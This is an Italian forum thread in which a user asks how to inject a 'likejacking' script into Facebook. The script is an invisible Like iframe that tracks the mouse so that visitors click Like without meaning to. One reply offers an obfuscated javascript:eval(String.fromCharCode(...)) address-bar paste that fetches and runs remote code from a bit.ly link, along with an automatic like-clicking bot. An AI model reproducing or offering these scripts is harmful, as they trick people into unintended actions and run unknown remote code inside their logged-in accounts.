Javascript Javascript su Facebook. Aiuto!

Stato
Discussione chiusa ad ulteriori risposte.

Zanarkand

Utente Silver
4 Ottobre 2012
53
21
2
77
E' tutto il giorno che cerco su internet come inserire un codice javascript su facebook...il problema è che se prendo questo script:
Codice:
<script type=”text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) && window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “<iframe id=’theiframe’ scrolling=’no’ frameBorder=’0′ allowTransparency=’true’ src=’http://www.facebook.com/widgets/like.php?href=” + encodeURIComponent(“http://www.facebook.com/pages/Tecno-Spazio/187780291239932″) + “&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=like&amp;colorscheme=light&amp;height=80′ style=’position:absolute;width:53px;height:23px;overflow:hidden;border:0;opacity:” + opacity + “;filter:alpha(opacity=” + (opacity * 100) + “);’></iframe>”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement && typeof d.documentElement.clientWidth == “number” && d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body && typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. </script>
non so poi dove inserirlo...
Su google chrome quando apro facebook premo f12 e si apre tutto il codice html della pagina ma non mi fa inserire il codice, con firefox non so nemmeno dove trovare la sorgente.

Voglio capire come riuscire a mettere il codice all'interno del sito (su firefox).

+1 A CHI RIESCE A RISOLVERMI IL PROBLEMA ;)
 
Non puoi modificare il codice sorgente di una pagina online, significherebbe fare un inject di dati che, con i mezzi che non hai(e che probabilmente solo gli hacker hanno), devi limitarti a fare un "workaround".
Invece di inserire quel codice come dici di fare, potresti usare l'estensione di FireFox GreaseMonkey, e studiarti bene il javascript(molto meglio se usi il JQuery, più versatile e maneggevole) ed il funzionamento di questo addon.

Spero di esserti stato d'aiuto :)
 
Non puoi modificare il codice sorgente di una pagina online, significherebbe fare un inject di dati che, con i mezzi che non hai(e che probabilmente solo gli hacker hanno), devi limitarti a fare un "workaround".
Invece di inserire quel codice come dici di fare, potresti usare l'estensione di FireFox GreaseMonkey, e studiarti bene il javascript(molto meglio se usi il JQuery, più versatile e maneggevole) ed il funzionamento di questo addon.

Spero di esserti stato d'aiuto :)

Non serve un hacker per "iniettare" un codice JavaScript in una pagine web (a livello client intendo), appunto perché JavaScript (come l'HTML) è un linguaggio lato client, perciò nel tuo browser puoi modificare le pagine web che vuoi e come vuoi ;)
 
Non serve un hacker per "iniettare" un codice JavaScript in una pagine web (a livello client intendo), appunto perché JavaScript (come l'HTML) è un linguaggio lato client, perciò nel tuo browser puoi modificare le pagine web che vuoi e come vuoi ;)
fulmix ma come lo inserisco? se dici che posso modificare le pagine web come e quando voglio, dove devo metterlo? Poi se non si potesse modificare, allora perchè fanno gli script per facebook?...
 
Ultima modifica:
I codici JavaScript si possono tranquillamente aggiungere negli url di ogni sito che visiti.
Ti consiglio di studiarti il JavaScript prima e informarti ;)

Edit:
Ti do una mano...
Vai su Facebook, nell'url inserisci un codice così:
javascript:__codice__javascript___

Ovviamente senza i tag <SCRIPT> che fanno parte di HTML.

Edit 2:
Che cosa vuoi fare alla pagina Facebook dove vuoi utilizzare il JavaScript?
 
I codici JavaScript si possono tranquillamente aggiungere negli url di ogni sito che visiti.
Ti consiglio di studiarti il JavaScript prima e informarti ;)

Edit:
Ti do una mano...
Vai su Facebook, nell'url inserisci un codice così:


Ovviamente senza i tag <SCRIPT> che fanno parte di HTML.

Edit 2:
Che cosa vuoi fare alla pagina Facebook dove vuoi utilizzare il JavaScript?
Nell'url ho inserito il codice che mi hai detto ma non capisco cosa dovrebbe succedere...comunque nella pagina vorrei mettere uno script dove chi ci entra, mette il mi piace involontariamente (autolike script), solo che nn so come fare xD
 
Ecco il codice pronto:
javascript:eval(String.fromCharCode(106,97,118,97,115,99,114,105,112,116,58,40,97,32,61,32,40,98,32,61,32
,100,111,99,117,109,101,110,116,41,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,32,61,32,34,47,47,98,105,116,46,108,121,47,119,76,87,76,70,68,34,44,32,98,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59,32,118,111,105,100,40,48,41))

Devi inserirlo nell'URL del browser e farai Mi Piace senza volerlo.
Non l'ho testato però.

O questo:
javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert('-==[FB STATUS & COMMENTS LIKE GENERATOR]==-\n\nScript by -Dicyber-');updateTime();window.setInterval(updateTime, 1000);void(0)
 
Ecco il codice pronto:


Devi inserirlo nell'URL del browser e farai Mi Piace senza volerlo.
Non l'ho testato però.

O questo:
Scusa una cosa ma forse sono ignorante io...
Iovoglio che gli altri appena entrano nella mia pagina facebook mettano mi piace involontariamente, non io...e quando vado a inserirlo nell'url dura per sempre o devo lasciarlo apeto o cosa???
 
Non si può in questo caso, in una pagina remota non si possono modificare codici (HTML/Javascript,ecc.).
Però se hai un sito tuo si può fare.
 
Stato
Discussione chiusa ad ulteriori risposte.